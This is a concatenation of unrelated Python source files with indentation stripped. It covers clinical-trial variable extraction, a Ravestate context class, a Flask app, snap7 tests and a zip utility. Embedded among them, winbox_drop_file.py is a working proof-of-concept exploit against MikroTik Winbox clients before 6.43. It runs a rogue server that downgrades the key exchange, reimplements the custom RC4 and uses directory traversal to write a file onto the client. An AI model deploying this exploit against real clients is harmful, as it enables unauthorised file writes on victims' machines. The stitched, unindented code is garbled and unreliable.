(exp_text, key_ngrams) = Valx_core.identify_variable(exp_text, feature_dict_dk, fea_dict_umls) # identify variable mentions and map to names
(variables, vars_values) = Valx_core.associate_variable_values(exp_text)
all_exps = []
for k in range(len(variables)):
curr_var = variables[k]
curr_exps = vars_values[k]
if curr_var in features:
fea_list = features[curr_var]
curr_exps = Valx_core.context_validation(curr_exps, fea_list[1], fea_list[2])
curr_exps = Valx_core.normalization(fea_list[3], curr_exps) # unit conversion and value normalization
curr_exps = Valx_core.hr_validation (curr_exps, float(fea_list[4]), float(fea_list[5])) # heuristic rule-based validation
if len(curr_exps) > 0:
if var == "All" or var.lower() == curr_var.lower() or var.lower() in curr_var.lower(): all_exps += curr_exps
if len(all_exps) > 0: output.append((trials[i][0], sections_num[j], candidates_num[j], exp_text, str(all_exps).replace("u'", "'"))) # output result
def extract_variables (fdin, ffea, ffea2, var, cores):
# read input dataset
if fdin is None or fdin =="": return False
trials = ufile.read_csv (fdin)
if trials is None or len(trials) <= 0:
        print(ext_print('input data error, please check either no such file or no data --- interrupting'))
return False
    print(ext_print('found a total of %d data items' % len(trials)))
# read feature list - domain knowledge
if ffea is None or ffea =="": return False
fea_dict_dk = ufile.read_csv_as_dict_with_multiple_items (ffea)
if fea_dict_dk is None or len(fea_dict_dk) <= 0:
        print(ext_print('no feature data available --- interrupting'))
return False
# get feature info
features, feature_dict_dk = {}, {}
if var == "All":
features = fea_dict_dk
del features["Variable name"]
elif var in fea_dict_dk:
features = {var: fea_dict_dk[var]}
    for key, value in fea_dict_dk.items():
names = value[0].lower().split('|')
for name in names:
if name.strip() != '': feature_dict_dk[name.strip()] = key
# read feature list - umls
if ffea2 is None or ffea2 =="": return False
fea_dict_umls = ufile.read_csv_as_dict (ffea2)
if fea_dict_umls is None or len(fea_dict_umls) <= 0:
        print(ext_print('no feature data available --- interrupting'))
return False
output = Manager().list()
jobs = []
for i in range(1,cores+1):
        t = Process(target=worker, args=(trials, len(trials)*(i-1)//cores, len(trials)*i//cores-1, var, features, feature_dict_dk, fea_dict_umls, output))
jobs.append(t)
t.start()
for j in jobs: j.join()
fout = os.path.splitext(fdin)[0] + "_exp_%s.csv" % var
ufile.write_csv (fout, output)
    print(ext_print('saved processed results into: %s' % fout))
return True
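# Illustrative helper (not called above): extract_variables hands each worker
# an inclusive [start, end] slice of the trials list computed as
# len(trials)*(i-1)//cores to len(trials)*i//cores - 1 for i in 1..cores. This
# standalone sketch reproduces that partitioning so the chunking can be checked
# in isolation, e.g. _example_chunk_bounds(10, 3) -> [(0, 2), (3, 5), (6, 9)].
def _example_chunk_bounds(n_items, cores):
    bounds = []
    for i in range(1, cores + 1):
        start = n_items * (i - 1) // cores
        end = n_items * i // cores - 1  # inclusive upper bound, matches worker()
        bounds.append((start, end))
    return bounds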
# processing the command line options
import argparse
def _process_args():
parser = argparse.ArgumentParser(description='')
parser.add_argument('-i', default=r"D:\_My_programs\_CUMC\Extract_Variables\_GitHub\data\example data diabetes_Type 1.csv", help='input: a specific disease')
parser.add_argument('-f1', default=r"D:\_My_programs\_CUMC\Extract_Variables\_GitHub\data\variable_features_dk.csv", help='input: a feature list')
parser.add_argument('-f2', default=r"D:\_My_programs\_CUMC\Extract_Variables\_GitHub\data\variable_features_umls.csv", help='input: a feature list')
parser.add_argument('-v', default="HBA1C", help='Variable name: All, HBA1C, BMI, Glucose, Creatinine, BP-Systolic, BP-Diastolic') # 'All' means to detect all variables
parser.add_argument('-c', default=4, type=int, help=' define the number of used CPU cores') #
return parser.parse_args(sys.argv[1:])
if __name__ == '__main__' :
print('')
args = _process_args()
extract_variables (args.i, args.f1, args.f2, args.v, args.c)
print('')
|
winbox_drop_file.py
|
import random
import threading
import socket
import sys
import time
##
# This file implements the Winbox server's key exchange and encryption mechanism
# for Winbox before 6.43. The key exchange is Diffie Hellman using a 1984 bit
# non-standard prime and the encryption is a custom RC4 drop-3072 using a 124
# byte session key.
#
# This server won't respond to the initial ECSRP-5 message from the client. When
# that happens, the client will then switch to the DH implementation.
#
# Furthermore, Winbox is vulnerable to directory traversal. A man in the middle
# can write files anywhere on the box. This PoC drops the file "lol.txt" in
# C:\Users\Public\ with the contents of "hello mikrotik"
##
##
# Obj: RC4
#
# An implementation of the RC4 logic used by MikroTik's Winbox on versions
# before 6.43. This is an RC4 drop-3072 with various non-standard mixing. The
# expected key is 0x78 bytes and is half of a session key generated / exchanged
# via Diffie Hellman key exchange.
##
class RC4:
# Standard RC4 drop-3072 initialization except for two things:
# 1. the value of j, after initializing S, is carried over to future computations
# 2. the value 'k' is introduced. While not used in the init function itself,
# this variable will be used to mix in previous computations in the
# "block crypt" function. I'm not sure if this is from some published
# variant of RC4 but I do wonder if it can help an attacker understand
# the stream state based on known plaintext?
def __init__(self, key):
# init the sbox
self.S = list(range(0x100))
j = 0
for i in range(0x100):
j = (j + key[i % len(key)] + self.S[i]) & 0xff
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
self.i = 0
self.j = j
self.k = 0
# "drop" 3072 of key stream
for _ in range(0xc00):
self.gen()
# Standard RC4 generation. *Only* used by init
def gen(self):
i = self.i = (self.i + 1) & 255
j = self.j = (self.j + self.S[i]) & 255
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
return self.S[(self.S[i] + self.S[j]) & 255]
def send_block_crypt(self, data, padding, client = False):
retval_data = bytearray(data)
data_length = len(retval_data)
counter = 0
j = self.j
while (counter < data_length):
i = (self.i + counter + 1) & 255
j = (j + self.k + self.S[i]) & 255
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_data[counter] = data[counter] ^ self.S[(self.S[i] + self.S[j]) & 255]
if client == True:
self.k = retval_data[counter]
else:
self.k = data[counter]
counter = counter + 1
j = self.k + j
for i in range(256):
j = (j + self.S[i] & 0xff)
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_padding = bytearray(10)
counter = 0
while (counter < 10):
i = (counter + (self.i + data_length + 1)) & 255
j = (j + self.S[i] & 0xff)
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_padding[counter] = padding[counter] ^ self.S[(self.S[i] + self.S[j]) & 255]
counter = counter + 1
self.i = data_length + 10
self.j = j
if client == False:
self.k = 0
return retval_padding + retval_data
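# Illustrative round-trip check (not used by the PoC): two RC4 engines seeded
# with the same half of the DH session key stay in sync because the sender
# mixes plaintext bytes into its state (client=False) while the receiver mixes
# the bytes it just decrypted (client=True). The 0x7c-byte key below is a
# made-up stand-in for a real session-key half.
def _example_rc4_round_trip():
    key = bytes(range(0x7c))
    sender = RC4(key)
    receiver = RC4(key)
    message = b'hello mikrotik'
    padding = b'\x00' * 10
    wire = sender.send_block_crypt(message, padding)               # encrypt
    plain = receiver.send_block_crypt(wire[10:], wire[:10], True)  # decrypt
    assert bytes(plain[10:]) == message
    return bytes(plain[10:])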
def get_request_id(data):
id_offset = data.find(b'\x06\x00\xff\x09')
if (id_offset == -1):
id_offset = data.find(b'\x06\x00\xff\x08')
        if (id_offset == -1):
return None
else:
return data[id_offset:id_offset+6]
else:
return data[id_offset:id_offset+5]
def get_login_hash(data):
hash_offset = data.find(b'\x0a\x00\x00\x31\x11\x00')
if (hash_offset == -1):
return None
else:
return data[hash_offset:hash_offset+22]
def downgrade_attack(sock):
# Currently just listening for messages to 5 (DH) and 6 (ECSRP)
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] == 5):
print('No need to downgrade. Received DH request.')
elif (handler[0] == 6):
# ignore this packet. This should trigger a DH request
ignore = sock.recv(message_length[0])
# the client should send a DH key exchange request now
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('Client didn\'t request a DH key exchange: %x' % handler[0])
sock.close()
return
else:
print('Client didn\'t request a key exchange: %x' % handler[0])
sock.close()
return
if (message_length[0] != 0xf8):
print('[-] Client sent unexpected amount of DH public data: %x' % message_length[0])
sock.close()
return
client_public_bytes = sock.recv(message_length[0])
client_public = int.from_bytes(client_public_bytes, byteorder='big', signed=False)
print('[+] Received client\'s public component:')
print('\t%x' % client_public)
print('[+] Generating a secret:')
local_secret = random.getrandbits(128)
print('\t%x' % local_secret)
print('[+] Computing server\'s public component: ')
shared_prime = int("B7BA220582B41518F8526BFE0F624DE926106DFB4F719DD93BC4309D49045A4175DB1C58C4D7843D16E766226894B31793B13E789FFD2CF3331267476031B30D2F995237F0B59A33A4F972FB1A618556EF8F332E7A3C366B24FDB39B42B0670B1F90A3D2E8C22E78DDA51A16B46A8E693BB9AED29E8509361BD438E76B1C235FCDD11E70A2B8C0EA15A9DFEA03278F39C12520A0BC36F21694546154C82E065B2EFFD7DDEBD5C1E588F9916F87D80E91303C9435A20E91DD1C9360DEF6A2B0D54FDA44049C0E8CC8A8049CBB1432C6E322D603F41DAA60028C40D78A8653F659C4FFC3F5D8A4E01A5C08E4B04B52388E9EF4A5E24569D15F", 16)
shared_base = 5
server_public = pow(shared_base, local_secret, shared_prime)
print('\t%x' % server_public)
print('[+] Sending server\'s public component to client.')
sock.sendall(b'\xf8' + b'\x05' + server_public.to_bytes(0xf8, byteorder='big'))
print('[+] Computing session key:')
shared_secret = pow(client_public, local_secret, shared_prime)
print('\t%x' % shared_secret)
mega_key = shared_secret.to_bytes(0xf8, byteorder='big')
send_key = mega_key[0x7c:]
recv_key = mega_key[:0x7c]
print('[+] Seeding RC4 engines')
crypto_out = RC4(send_key)
crypto_in = RC4(recv_key)
print('[+] Waiting for salt request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
if (message_length[0] != 0x38):
print('[-] Client request is an unexpected length: %x' % message_length[0])
sock.close()
return
print('[+] Received salt request')
encrypted_salt_request = sock.recv(message_length[0])
payload = encrypted_salt_request[12:]
padding = encrypted_salt_request[2:12]
print('[+] Decrypting the request')
    indata = crypto_in.send_block_crypt(payload, padding, True)
print('[+] Sending salt response')
# Our response actually provides a 0 length salt. Which the client seems
# to happily accept.
padding = b'\x00'*10
salt_response = (b'M2\x01\x00\xff\x88\x02\x00\x00\x00\x00\x00' +
b'\x0b\x00\x00\x00\x02\x00\xff\x88\x02\x00\x0d\x00\x00\x00\x04' +
b'\x00\x00\x00\x03\x00\xff\x09\x02\x06\x00\xff\x09\x02\x09\x00' +
b'\x00\x31\x00')
    outdata = crypto_out.send_block_crypt(salt_response, padding)
print('%x' % len(outdata))
sock.sendall(b'\x39' + b'\x05' + b'\x00' + b'\x2d' + outdata)
print('[+] Waiting for a login request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received a login request')
encrypted_salt_request = sock.recv(message_length[0])
payload = encrypted_salt_request[12:]
padding = encrypted_salt_request[2:12]
print('[+] Decrypting the request')
    indata = crypto_in.send_block_crypt(payload, padding, True)
request_field = get_request_id(indata)
hash_field = get_login_hash(indata)
padding = b'\x00'*10
login_response = (b'M2\x01\x00\xff\x88\x02\x00\x00\x00\x00\x00\x0b\x00\x00\x00' +
b'\x02\x00\xff\x88\x02\x00\x0d\x00\x00\x00\x04\x00\x00\x00' +
b'\x13\x00\x00\x00\x0b\x00\x00\x08\xfe\xff\x07\x00' +
b'\x0f\x00\x00\x09\x00\x10\x00\x00\x09\x00\x01\x00\xfe\x09\x06' +
b'\x03\x00\xff\x09\x02' + request_field +
b'\x16\x00\x00\x21\x04\x33\x2e\x31\x31\x17\x00\x00\x21\x03\x78\x38\x36' +
b'\x15\x00\x00\x21\x03\x78\x38\x36\x18\x00\x00\x21\x07\x64\x65\x66\x61' +
b'\x75\x6c\x74\x11\x00\x00\x21\x04\x69\x33\x38\x36' + hash_field)
    outdata = crypto_out.send_block_crypt(login_response, padding)
print("%x" % len(outdata))
sock.sendall(b'\x93' + b'\x05' + b'\x00' + b'\x87' + outdata)
print('[+] Waiting for list request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 0x02):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received list request')
list_request = sock.recv(message_length[0])
if (list_request.find(b'list') == -1):
print('[-] No list in the list request.')
list_response = (b'{ crc: 164562873, size: 36, name: "../../../../../../../../../Users/Public/lol.txt", unique: "advtool-fc1932f6809e.jg", version: "6.39.3" },\n' +
b'{ crc: 2939435109, size: 3082, name: "dhcp.jg", unique: "dhcp-eaa3bb8c4b37.jg", version: "6.39.3" },\n' +
b'{ crc: 1183779834, size: 12489, name: "dude.jg", unique: "dude-65f18faed649.jg", version: "6.39.3" },\n' +
b'{ crc: 444782794, size: 433, name: "gps.jg", unique: "gps-21fa81423a5e.jg", version: "6.39.3" },\n' +
b'{ crc: 2740765060, size: 4060, name: "hotspot.jg", unique: "hotspot-2813a8dedd22.jg", version: "6.39.3" },\n' +
b'{ crc: 1093970965, size: 22451, name: "icons.png", version: "6.39.3" },\n' +
b'{ crc: 1377190509, size: 6389, name: "ipv6.jg", unique: "ipv6-38ef11eebb50.jg", version: "6.39.3" },\n' +
b'{ crc: 165461532, size: 1473, name: "kvm.jg", unique: "kvm-6e1029470a44.jg", version: "6.39.3" },\n' +
b'{ crc: 667857209, size: 455, name: "lcd.jg", unique: "lcd-30a740bf5375.jg", version: "6.39.3" },\n' +
b'{ crc: 2317237032, size: 3578, name: "mpls.jg", unique: "mpls-9e478c42eb58.jg", version: "6.39.3" },\n' +
b'{ crc: 332542720, size: 457, name: "ntp.jg", unique: "ntp-412e80e06f88.jg", version: "6.39.3" },\n' +
b'{ crc: 2870762863, size: 2342, name: "pim.jg", unique: "pim-fac4ce9edd44.jg", version: "6.39.3" },\n' +
b'{ crc: 2324128268, size: 4399, name: "ppp.jg", unique: "ppp-5d3353bc82f1.jg", version: "6.39.3" },\n' +
b'{ crc: 1771368162, size: 61639, name: "roteros.jg", unique: "roteros-228bb3ad6def.jg", version: "6.39.3" },\n' +
b'{ crc: 2911091806, size: 8240, name: "roting4.jg", unique: "roting4-2cabe59181eb.jg", version: "6.39.3" },\n' +
b'{ crc: 367607478, size: 3434, name: "secure.jg", unique: "secure-772b3b028ba8.jg", version: "6.39.3" },\n' +
b'{ crc: 1617938236, size: 765, name: "ups.jg", unique: "ups-e29683c8d492.jg", version: "6.39.3" },\n' +
b'{ crc: 3264462467, size: 15604, name: "wlan6.jg", unique: "wlan6-032bb1ee138d.jg", version: "6.39.3" },\n')
## header
header = b'\x6c\x69\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x07\x29\x00\x00\x00\x00'
all_of_it = header + list_response
chunks = []
looper = range(0, len(all_of_it), 255)
for n in looper:
if ((n + 255) > len(all_of_it)):
chunks.append(all_of_it[n:])
else:
chunks.append(all_of_it[n:n+255])
# send first bytes
sock.sendall(b'\xff\x02')
first = True
for n in chunks:
if first == True:
first = False
sock.sendall(n)
else:
if (len(n) == 255):
sock.sendall(b'\xff\xff')
sock.sendall(n)
else:
sock.sendall(bytes([len(n)]))
sock.sendall(b'\xff')
sock.sendall(n)
print('[+] Waiting for list close message')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 0x02):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received list close message')
list_request = sock.recv(message_length[0])
if (list_request.find(b'list') == -1):
print('[-] No list in the list close message.')
sock.sendall(b'\x12\x02\x6c\x69\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x07\x29')
print('[+] Waiting for file message')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 0x02):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received file message')
list_request = sock.recv(message_length[0])
if (list_request.find(b'../../../') == -1):
        print('[-] No lol.txt in the file message.')
header = b'../../../.\x00\x01\x24\x00\x00\x00\x00\x00'
gzip = b'\x1f\x8b\x08\x08\x62\x85\x1f\x5e\x00\x03\x6c\x6f\x6c\x00\xcb\xc8\x54\xc8\xcd\xcc\x2e\xca\x2f\xc9\xcc\xe6\x02\x00\xc8\x62\x79\x42\x0c\x00\x00\x00'
all_of_it = header + gzip
# send first bytes
sock.sendall(bytes([len(all_of_it)]))
sock.sendall(b'\x02')
sock.sendall(all_of_it)
sock.close()
return
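# Toy-sized illustration (not used by the PoC) of the Diffie-Hellman exchange
# performed above: each side raises the shared base to its own secret, swaps
# the result with the peer, and raises the peer's public value to its own
# secret, landing on the same shared value mod the prime. The real handshake
# uses the 1984-bit non-standard prime hard-coded in downgrade_attack; the
# 32-bit modulus here is just for a quick self-check.
def _example_dh_exchange(prime=0xFFFFFFFB, base=5):
    client_secret = random.getrandbits(32)
    server_secret = random.getrandbits(32)
    client_public = pow(base, client_secret, prime)
    server_public = pow(base, server_secret, prime)
    client_shared = pow(server_public, client_secret, prime)
    server_shared = pow(client_public, server_secret, prime)
    assert client_shared == server_shared
    return client_shared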
if __name__ == '__main__':
# bind to 8291 on all interfaces
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 8291))
server.listen(5)
print('[+] Listening on 0.0.0.0:8291')
while True:
client_sock, address = server.accept()
print('[+] Accepted connection from %s:%s' % (address[0], address[1]))
client_handler = threading.Thread(target=downgrade_attack, args=(client_sock,))
client_handler.start()
|
context.py
|
# Ravestate context class
import importlib
from threading import Thread, Lock, Semaphore
import logging
from ravestate import icontext
from ravestate import activation
from ravestate import module
from ravestate import state
from ravestate import property
from ravestate import registry
class Context(icontext.IContext):
default_signals = (":startup", ":shutdown", ":idle")
default_property_signals = (":changed", ":pushed", ":popped", ":deleted")
def __init__(self, configfile: str=""):
self.signal_queue = []
self.signal_queue_lock = Lock()
self.signal_queue_counter = Semaphore(0)
self.run_task = None
self.shutdown_flag = False
self.properties = {}
self.activation_candidates = dict()
self.states = set()
self.states_per_signal = {signal_name: set() for signal_name in self.default_signals}
self.states_lock = Lock()
def emit(self, signal_name: str):
with self.signal_queue_lock:
self.signal_queue.append(signal_name)
self.signal_queue_counter.release()
def run(self):
if self.run_task:
logging.error("Attempt to start context twice!")
return
self.run_task = Thread(target=self._run_private)
self.run_task.start()
self.emit(":startup")
def shutting_down(self):
return self.shutdown_flag
def shutdown(self):
self.shutdown_flag = True
self.emit(":shutdown")
self.run_task.join()
def add_module(self, module_name: str):
if registry.has_module(module_name):
self._module_registration_callback(registry.get_module(module_name))
return
registry.import_module(module_name=module_name, callback=self._module_registration_callback)
def add_state(self, *, mod: module.Module, st: state.State):
if st in self.states:
logging.error(f"Attempt to add state `{st.name}` twice!")
return
        # annotate the state's signal name with its module name
if len(st.signal) > 0:
st.signal = f"{mod.name}:{st.signal}"
st.module_name = mod.name
# make sure that all of the state's depended-upon properties exist
for prop in st.read_props+st.write_props:
if prop not in self.properties:
logging.error(f"Attempt to add state which depends on unknown property `{prop}`!")
# register the state's signal
with self.states_lock:
if st.signal:
self.states_per_signal[st.signal] = set()
# make sure that all of the state's depended-upon signals exist
for clause in st.triggers:
for signal in clause:
if signal in self.states_per_signal:
self.states_per_signal[signal].add(st)
else:
logging.error(f"Attempt to add state which depends on unknown signal `{signal}`!")
self.states.add(st)
def rm_state(self, *, st: state.State):
if st not in self.states:
logging.error(f"Attempt to remove unknown state `{st.name}`!")
return
with self.states_lock:
if st.signal:
self.states_per_signal.pop(st.signal)
for clause in st.triggers:
for signal in clause:
self.states_per_signal[signal].remove(st)
self.states.remove(st)
def add_prop(self, *, mod: module.Module, prop: property.PropertyBase):
        if prop.name in (existing.name for existing in self.properties.values()):
logging.error(f"Attempt to add property {prop.name} twice!")
return
# prepend module name to property name
prop.module_name = mod.name
# register property
self.properties[prop.fullname()] = prop
# register all of the property's signals
with self.states_lock:
for signal in self.default_property_signals:
self.states_per_signal[prop.fullname()+signal] = set()
def __setitem__(self, key, value):
pass
def __getitem__(self, key):
return self.properties[key]
def _module_registration_callback(self, mod: module.Module):
for st in mod.states:
self.add_state(mod=mod, st=st)
for prop in mod.props:
self.add_prop(mod=mod, prop=prop)
def _run_private(self):
while not self.shutdown_flag:
# TODO: Recognize and signal Idle-ness
self.signal_queue_counter.acquire()
with self.signal_queue_lock:
signal_name = self.signal_queue.pop(0)
# collect states which depend on the new signal,
# and create state activation objects for them if necessary
logging.debug(f"Received {signal_name} ...")
with self.states_lock:
for state in self.states_per_signal[signal_name]:
if state.name not in self.activation_candidates:
self.activation_candidates[state.name] = activation.StateActivation(state, self)
logging.debug("State activation candidates: \n"+"\n".join(
"- "+state_name for state_name in self.activation_candidates))
current_activation_candidates = self.activation_candidates
self.activation_candidates = dict()
consider_for_immediate_activation = []
# go through candidates and remove those which want to be removed,
# remember those which want to be remembered, forget those which want to be forgotten
for state_name, act in current_activation_candidates.items():
notify_return = act.notify_signal(signal_name)
logging.debug(f"-> {act.state_to_activate.name} returned {notify_return} on notify_signal {signal_name}")
if notify_return == 0:
self.activation_candidates[state_name] = act
elif notify_return > 0:
consider_for_immediate_activation.append(act)
# ignore act_state -1: Means that state activation is considering itself canceled
# sort the state activations by their specificity
consider_for_immediate_activation.sort(key=lambda act: act.specificity(), reverse=True)
# let the state with the highest specificity claim write props first, then lower ones.
            # a state will only be activated if all of its write-props are available.
# TODO: Recognize same-specificity states and actively decide between them.
claimed_write_props = set()
for act in consider_for_immediate_activation:
all_write_props_free = True
for write_prop in act.state_to_activate.write_props:
if write_prop in claimed_write_props:
all_write_props_free = False
break
                if all_write_props_free:
                    logging.debug(f"-> Activating {act.state_to_activate.name}")
                    # claim the write-props so lower-specificity states can't also grab them
                    claimed_write_props.update(act.state_to_activate.write_props)
                    thread = act.run()
                    thread.start()
else:
logging.debug(f"-> Dropping activation of {act.state_to_activate.name}.")
|
flasky.py
|
# -*- coding: utf-8 -*-
from flask import Flask, request, make_response, render_template, Response, redirect, url_for
from .notifier import WebSocket
import json
from .utils.inventory import PlayBookFactory, async_run_playbook
import threading
import time
app = Flask(__name__)
@app.route('/api/<path:version>/<path:action>', methods=['POST'])
def api_view(version, action):
"""
"""
data = request.form
print(data)
WebSocket.send_message(json.dumps(data))
return make_response(Response())
@app.route('/')
def index_view():
return render_template('index.html')
def long_task():
time.sleep(5)
print('long task')
@app.route('/run')
def longtask_view():
pb = PlayBookFactory('production', inventory='op/inventory')
#pb.run_task()
async_run_playbook(pb)
t = threading.Thread(target=long_task)
t.start()
    return redirect(url_for('index_view'))
|
test_logo_client.py
|
import logging
import time
import unittest
from multiprocessing import Process
from os import kill
import snap7
from snap7.server import mainloop
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 0x1000
slot = 0x2000
class TestLogoClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.process = Process(target=mainloop)
cls.process.start()
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
        kill(cls.process.pid, 1)
def setUp(self):
self.client = snap7.logo.Logo()
self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def test_read(self):
vm_address = "V40"
value = 50
self.client.write(vm_address, value)
result = self.client.read(vm_address)
self.assertEqual(value, result)
def test_write(self):
vm_address = "V20"
value = 8
self.client.write(vm_address, value)
def test_get_connected(self):
self.client.get_connected()
def test_set_param(self):
values = (
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
self.assertRaises(Exception, self.client.set_param,
snap7.types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.types.RemotePort, tcpport),
(snap7.types.PingTimeout, 750),
(snap7.types.SendTimeout, 10),
(snap7.types.RecvTimeout, 3000),
(snap7.types.SrcRef, 256),
(snap7.types.DstRef, 0),
(snap7.types.SrcTSap, 4096),
(snap7.types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = (snap7.types.LocalPort, snap7.types.WorkInterval, snap7.types.MaxClients,
snap7.types.BSendTimeout, snap7.types.BRecvTimeout, snap7.types.RecoveryTime,
snap7.types.KeepAliveTime)
# invalid param for client
for param in non_client:
            self.assertRaises(Exception, self.client.get_param, param)
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.types.RemotePort, 1102),
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
if __name__ == '__main__':
unittest.main()
|
pzip.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from multiprocessing import Process, Value, Lock
from threading import Semaphore, Thread
import zipfile
import argparse
import time
def pyzip(args, t=False):
global count
if t == True:
try:
while count.value < len(args):
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
if os.path.isfile(files):
with zipfile.ZipFile(files+'.zip', mode='w') as zf:
zf.write(files)
else:
raise IOError
except:
print 'File doesn\'t exist'
sys.exit()
else:
while count.value < len(args):
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
if os.path.isfile(files):
with zipfile.ZipFile(files+'.zip', mode='w') as zf:
zf.write(files)
def pyunzip(args, t=False):
global count
if t == True:
try:
while count.value < len(args):
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
if os.path.isfile(files):
with zipfile.ZipFile(files) as zf:
zf.extractall()
else:
raise IOError
except:
print 'File doesn\'t exist'
sys.exit()
else:
while count.value < len(args):
            # critical section
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
#--------------
if os.path.isfile(files):
with zipfile.ZipFile(files) as zf:
zf.extractall()
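# Illustrative sketch (not called by the script) of the shared-counter pattern
# used in pyzip/pyunzip above: `count` is a multiprocessing.Value shared by all
# worker processes and `mutex` guards the read-and-increment (the critical
# section), so each file index is claimed by exactly one process.
def _example_claim_next_index(shared_count, lock, n_items):
    lock.acquire()
    try:
        if shared_count.value >= n_items:
            return None  # nothing left to claim
        index = shared_count.value
        shared_count.value += 1
    finally:
        lock.release()
    return index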
if __name__ == '__main__':
    # command-line arguments
parser = argparse.ArgumentParser(prog='pzip', description='Zip or unzip files')
parser.add_argument('-c', action='store_const', dest='pyzip', const=True)
parser.add_argument('-d', action='store_const', dest='pyunzip', const=True)
parser.add_argument('-p', metavar='n', nargs='?', action='append', dest='process', const=True)
parser.add_argument('-t', action='store_const', dest='targ', const=True)
parser.add_argument('{ficheiros}', nargs='*')
args = parser.parse_args()
count = Value('i', 0)
start_time = time.time()
    # list of worker processes
processes = []
mutex = Lock()
    # argument validation
if args.pyzip == True and args.pyunzip == None:
if args.process:
if args.targ:
listArgs = [elem for elem in sys.argv[5:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
                    i_files = raw_input('What file do you want to zip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
else:
listArgs = [elem for elem in sys.argv[4:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
                    i_files = raw_input('What file do you want to zip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
for i in range(int(sys.argv[3])):
if args.targ:
t = True
newT = Process(target=pyzip, args=(listArgs, t,))
newT.start()
else:
newT = Process(target=pyzip, args=(listArgs,))
newT.start()
processes.append(newT)
for p in processes:
p.join()
else:
if args.targ:
listArgs = [elem for elem in sys.argv[3:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
                    i_files = raw_input('What file do you want to zip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
t = True
pyzip(listArgs, t)
else:
listArgs = [elem for elem in sys.argv[2:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to zip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
pyzip(listArgs)
else:
pyzip(listArgs)
    print 'Zipped',count.value,'files'
    print 'Execution time: ',time.time() - start_time,'seconds'
if args.pyunzip == True and args.pyzip == None:
if args.process:
if args.targ:
listArgs = [elem for elem in sys.argv[5:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
else:
listArgs=[elem for elem in sys.argv[4:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
for i in range(int(sys.argv[3])):
if args.targ:
t = True
newT = Process(target=pyunzip, args=(listArgs,t,))
                newT.start()
else:
newT = Process(target=pyunzip, args=(listArgs,))
newT.start()
processes.append(newT)
for p in processes:
p.join()
else:
if args.targ:
            listArgs = [elem for elem in sys.argv[3:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
t = True
            pyunzip(listArgs, t)
else:
listArgs = [elem for elem in sys.argv[2:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
pyunzip(listArgs)
else:
pyunzip(listArgs)
    print 'Unzipped',count.value,'files'
    print 'Execution time: ',time.time() - start_time,'seconds'
if args.pyzip == True and args.pyunzip == True:
